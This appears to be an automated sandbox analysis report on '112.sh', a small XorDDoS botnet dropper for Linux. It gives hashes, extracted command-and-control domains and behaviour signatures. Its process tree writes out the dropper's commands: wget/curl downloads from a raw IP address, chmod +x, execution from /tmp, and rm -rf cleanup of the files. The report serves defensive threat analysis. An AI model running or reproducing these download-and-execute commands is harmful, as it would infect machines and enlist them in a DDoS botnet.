Analysis
-
max time kernel
75s -
max time network
86s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
22-12-2024 07:56
Static task
static1
Behavioral task
behavioral1
Sample
112.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
112.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
112.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
112.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
112.sh
-
Size
318B
-
MD5
0368897400a135549c0a2d9d83d384cc
-
SHA1
29c933b2a8dd201b4aaea73789664dda02c2fe75
-
SHA256
ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4
-
SHA512
00216c30c5ab73b63821846febd159ac0be3c5a6658921ce9753c858ff2f83d698518c67283a9b2bea9da6067698b1302b6d84bf65ada476aba60bc35eedd758
Malware Config
Extracted
xorddos
api.markerbio.com:112
api.enoan2107.com:112
http://qq.com/lib.asp
-
crc_polynomial
CDB88320
Signatures
-
XorDDoS
Botnet and downloader malware targeting Linux-based operating systems and IoT devices.
-
XorDDoS payload 1 IoCs
resource yara_rule behavioral2/files/fstream-1.dat family_xorddos -
Xorddos family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 761 chmod 773 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/112 762 112 /tmp/112s 774 112s -
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/112 wget File opened for modification /tmp/112 curl File opened for modification /tmp/112s wget File opened for modification /tmp/112s curl
Processes
-
/tmp/112.sh/tmp/112.sh1⤵PID:646
-
/usr/bin/wgetwget http://43.249.172.195:888/1122⤵
- Writes file to tmp directory
PID:647
-
-
/usr/bin/curlcurl -O http://43.249.172.195:888/1122⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/chmodchmod +x 1122⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/112./1122⤵
- Executes dropped EXE
PID:762
-
-
/usr/bin/wgetwget http://43.249.172.195:888/112s2⤵
- Writes file to tmp directory
PID:764
-
-
/usr/bin/curlcurl -O http://43.249.172.195:888/112s2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/chmodchmod +x 112s2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/112s./112s2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm -rf 112.sh2⤵PID:776
-
-
/bin/rmrm -rf 1122⤵PID:777
-
-
/bin/rmrm -rf 112s2⤵PID:778
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
549KB
MD5f9191bab1e834d4aef3380700639cee9
SHA19c20269df6694260a24ac783de2e30d627a6928a
SHA256ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73
SHA5123d2758fe2d06183e627b5cc24919c08c84108f2efd7ab0a162029d55537476410d9535d50f3eb059f7153f7482c134284862eea121201f82838aace4b12283b5